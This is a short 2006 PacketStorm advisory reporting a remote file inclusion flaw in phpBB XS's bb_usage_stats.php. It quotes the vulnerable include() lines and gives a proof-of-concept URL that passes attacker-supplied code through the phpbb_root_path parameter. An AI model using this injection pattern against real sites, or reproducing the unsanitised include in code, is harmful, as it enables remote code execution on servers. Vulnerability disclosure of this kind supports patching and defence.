Noge_adv_02.txt

2006-09-16T00:00:00
ID PACKETSTORM:50115
Type packetstorm
Reporter NoGe
Modified 2006-09-16T00:00:00

Description

                                        
                                            `#############################SolpotCrew Community################################  
#  
# phpBB XS (phpbb_root_path) Remote File Include  
#  
# Download file : http://www.phpbbxs.eu/dload.php?action=category&cat_id=2  
#  
#################################################################################  
#  
#  
# Bug Found By : NoGe a.k.a da_jackass   
#  
# contact: jong_amq@hotmail.com   
#   
# Website : http://nyubicrew.org/adv/Noge_adv_02.txt  
#  
################################################################################  
#  
#  
# Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan  
# yooogy[pa bozz] siwa^lima sagu mousekill ilalang13  
# #papmahackerlink #nyubi #maluku-hacker #papuahacker  
#   
###############################################################################  
# Vulnerable found in bb_usage_stats.php   
  
line 24 include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx);   
line 25 include($phpbb_root_path . 'bb_usage_stats/language/lang_' . $board_config['default_lang'] . '/bb_usage_stats_lang.' . $phpEx);   
line 26 include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_functions.' . $phpEx);   
  
  
# Exploit   
  
http://victim.com/[path]/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=[evilcode]   
  
######################################E.O.F##################################  
`